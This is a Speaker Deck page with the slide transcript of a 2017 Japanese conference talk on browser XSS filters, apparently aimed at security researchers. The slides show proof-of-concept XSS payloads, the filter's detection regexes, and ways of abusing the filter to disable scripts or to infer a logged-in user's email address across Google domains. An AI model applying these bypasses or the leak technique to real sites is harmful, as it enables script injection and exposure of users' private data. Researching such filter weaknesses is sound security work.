Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

Sponsored · Ship Features Fearlessly Turn features on and off without deploys. Used by thousands of Ruby developers.
Avatar for Masato Kinugawa Masato Kinugawa
March 31, 2017
Technology
3.3k
7

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。

Avatar for Masato Kinugawa

Masato Kinugawa

March 31, 2017

More Decks by Masato Kinugawa

See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
Avatar for Masato Kinugawa masatokinugawa
0
760
Shadow DOM & Security - Exploring the boundary between light and shadow
Avatar for Masato Kinugawa masatokinugawa
1
2k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
Avatar for Masato Kinugawa masatokinugawa
1
1.1k
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
Avatar for Masato Kinugawa masatokinugawa
8
4.3k
バグハンティングのすゝめ / P3NFEST
Avatar for Masato Kinugawa masatokinugawa
5
2.7k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
Avatar for Masato Kinugawa masatokinugawa
13
21k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
Avatar for Masato Kinugawa masatokinugawa
1
24k
JSでDoSる/ Shibuya.XSS techtalk #11
Avatar for Masato Kinugawa masatokinugawa
20
7.1k
Electron: Abusing the lack of context isolation - CureCon(en)
Avatar for Masato Kinugawa masatokinugawa
5
110k

Other Decks in Technology

See All in Technology
ADOTで始めるサーバレスアーキテクチャのオブザーバビリティ
Avatar for Ryotaro Harada alchemy1115
2
240
AIがコードを書く時代の ジェネレーティブプログラミング
Avatar for polidog polidog
PRO
3
580
Babylon.js を使って試した色々な内容 / Various things I tried using Babylon.js / Babylon.js 勉強会 vol.5
Avatar for you(@youtoy) you
PRO
0
250
2026-04-02 IBM Bobオンボーディング入門
Avatar for YutaNonaka yutanonaka
0
240
プロダクトを触って語って理解する、チーム横断バグバッシュのすすめ / 20260411 Naoki Takahashi
Avatar for SHIFT EVOLVE shift_evolve
PRO
1
190
フルカイテン株式会社 エンジニア向け採用資料
Avatar for FULL KAITEN fullkaiten
0
11k
20260326_AIDD事例紹介_ULSC.pdf
Avatar for ファインディ株式会社(イベント資料アップ用) findy_eventslides
0
570
Webアクセシビリティは“もしも”に備える設計
Avatar for tomokusaba tomokusaba
0
170
AWS DevOps Agent or Kiro の使いどころを考える_20260402
Avatar for モブエンジニア(Masaki Okuda) masakiokuda
0
190
Oracle Cloud Infrastructure:2026年3月度サービス・アップデート
Avatar for oracle4engineer oracle4engineer
PRO
0
410
OCI技術資料 : ロード・バランサ 概要 - FLB・NLB共通
Avatar for Oracle Cloud Infrastructure ソリューション・エンジニア ocise
4
27k
Databricks Appsで実現する社内向けAIアプリ開発の効率化
Avatar for R-Miura r_miura
0
330

Featured

See All Featured
Navigating the moral maze — ethical principles for Al-driven product design
Avatar for Skipper Chong Warson skipperchong
2
320
Pawsitive SEO: Lessons from My Dog (and Many Mistakes) on Thriving as a Consultant in the Age of AI
Avatar for David Carrasco davidcarrasco
0
110
Designing Dashboards & Data Visualisations in Web Apps
Avatar for Des Traynor destraynor
231
54k
The Curious Case for Waylosing
Avatar for Cassini Nazir cassininazir
0
290
Highjacked: Video Game Concept Design
Avatar for Ryan Kendrick rkendrick25
PRO
1
340
A Soul's Torment
Avatar for Nat Ma seathinner
5
2.6k
The SEO Collaboration Effect
Avatar for Kristina Bergwall kristinabergwall1
0
420
Redefining SEO in the New Era of Traffic Generation
Avatar for Szymon Słowik szymonslowik
1
270
Noah Learner - AI + Me: how we built a GSC Bulk Export data pipeline
Avatar for Tech SEO Connect techseoconnect
PRO
0
160
Agile Actions for Facilitating Distributed Teams - ADO2019
Avatar for Mark Kilby mkilby
0
170
How to optimise 3,500 product descriptions for ecommerce in one day using ChatGPT
Avatar for Katarina Dahlin katarinadahlin
PRO
1
3.5k
Beyond borders and beyond the search box: How to win the global "messy middle" with AI-driven SEO
Avatar for David Carrasco davidcarrasco
3
100

Transcript

  1. None
  2. None

  3. ❶ ➌ ❷ ❹

  4. None

  5. https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>

  6. https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>

  7. https://addons.mozilla.org/ja/firefox/addon/noscript/

  8. HTTP/1.1 200 OK Date: Tue, 28 Mar 2017 06:16:00 GMT

    Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
  9. None
  10. None
  11. None

  12. https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">

  13. None

  14. <input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>"> <!-- <svg #nload=alert(1)> -->

    https://example.com/?q="><svg+onload=alert(1)>

  15. <input value=""><svg onload=alert(1)>"> <input value="<svg onload=alert(1)>"> <!-- <aaa onload=alert(1)> -->

    https://example.com/?q="><svg+onload=alert(1)>

  16. https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701

  17. <title>&lt;script&gt; - Google 検索</title> <script>(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script>

  18. <script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ // ??? }

    </script> https://example.com/?<script src=//example.jp/jquery.js></script>
  19. None

  20. {<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9

    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] "><svg #nload=alert#1#>

  21. [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>

  22. "><svg onload=alert(1)> [\"\'][ ]*(([^a-z0- 9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])) )).+?{\(}.*?{\)} x="";alert(1)//"

  23. None

  24. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622

  25. https://www.slideshare.net/masatokinugawa/xxn-ja

  26. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>"; </script> URL:

    ?q=";document.body.innerHTML="<xss>

  27. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js" type="text/javascript"> </script>

    URL: ?"/++.+++=

  28. "style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf:

  29. <script src="//example^co.jp/test.js" type="text/javascript"> </script>

  30. window#name//Syntax Error window^name//Syntax OK <script> window.name

  31. None

  32. url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;} }

  33. https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34 ECMAScript 6 from

    an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else

  34. https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]"; </script> <script> foo=`#; q="${alert(1)}#`//"; </script>

  35. https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript"> </script> [...]

  36. https://bugs.chromium.org/p/chromium/issues/detail?id=654794

  37. None

  38. http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

  39. https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…) if(win.length == 0){ //

    // }else{ // } <script>…</script>

  40.     

  41. https://www.youtube.com/watch?v=IMDWjKFbsJE

  42. HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options:

    SAMEORIGIN

  43. https://accounts.google.com/ServiceLogin?

  44. google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br

    google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(

  45. ✨ ✨ ✨

  46. {<a.*?hr{e}f}

  47. 0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>

    5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/

  48. 0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>

    5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref

  49. 0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3 <aAAAhr#f> 4 <aAAAAhr#f>

    5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/?<a%2Bhref

  50. 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_

    A a 0x00 0-9 < B-Z b-z

  51. 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_

    A a 0x00 0-9 < B-Z b-z

  52. <div class="gb_xb">[email protected]</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

  53. ✔ ✔ ✔ ✔

  54. <div class="gb_xb">[email protected]</div><div class="gb_pb">

  55. https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]=

  56. https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.ru/?"[email protected]=

    https://www.google.ru/?"[email protected]=

  57. https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ca/?"[email protected]= ...

  58. ✨ ✨ ✨

  59. None
  60. None
  61. None
  62. None

  63.   

  64.     

  65.      

  66. None